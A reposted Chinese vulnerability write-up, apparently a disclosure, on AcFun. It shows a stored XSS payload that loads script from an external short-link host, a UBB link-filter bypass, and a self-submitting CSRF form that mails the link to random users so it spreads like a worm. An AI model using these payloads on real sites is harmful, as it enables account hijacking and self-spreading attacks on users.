鸿 网 互 联 www.68idc.cn

当前位置 : 服务器租用 > 网站安全 > 安全设置 > >

XSS+CSRF对ACFUN用户持久劫持与自传播,详细分析与突破手段

来源:互联网 作者:佚名 时间:2015-10-19 08:41
用户中心好友分组位置: xx=x 页面上有长度检测,不过没关系,抓包构造: name=addGroupgroupName=x onmouseover=var h=document.getElementsByTagName(head)[0];var s=document.createElement(script);s.src=http://126.am/70Qdp3;h.appendChild(s); id=xss

用户中心好友分组位置:


x"x="x



页面上有长度检测,不过没关系,抓包构造:


name=addGroup&groupName=x" onmouseover="var h=document.getElementsByTagName('head')[0];var s=document.createElement('script');s.src='http://126.am/70Qdp3';h.appendChild(s);" id="xss" style="position: absolute; top: 0px; left: 0px; z-index: 999; padding: 1000px; filter:alpha(opacity=0); -moz-opacity:0;opacity:0;"

 

效果:



js内容:


alert('xss script');
$("#xss").remove();

 

下面是利用自传播:

用户中心里私信功能可以发送链接,链接位置有过滤,只允许链接到acfun.tv域名下:



但是通过构造UBB可绕过:


[url=http://www.acfun.tv@126.am/n6ccT0]http://www.acfun.tv/v/ac634542[/url]



同时http://www.acfun.tv/api/mail.aspx?name=newMail位置没有来源验证:


<html>
<body>
<form id="csrf" name="csrf" action="http://www.acfun.tv/api/mail.aspx?name=newMail" method="POST">
<input type="hidden" name="userId" value="<?php echo rand(1000,250000);?>" />
<input type="hidden" name="content" value="[url=http://www.acfun.tv@126.am/n6ccT0]http://www.acfun.tv/v/ac634542[/url]" />
<input type="submit" value="submit" />
</form>
<script>
document.csrf.submit();
</script>
</body>
</html>

劫持关注通知传播一条龙...:




 


 

修复方案:

你们比我懂..

网友评论
<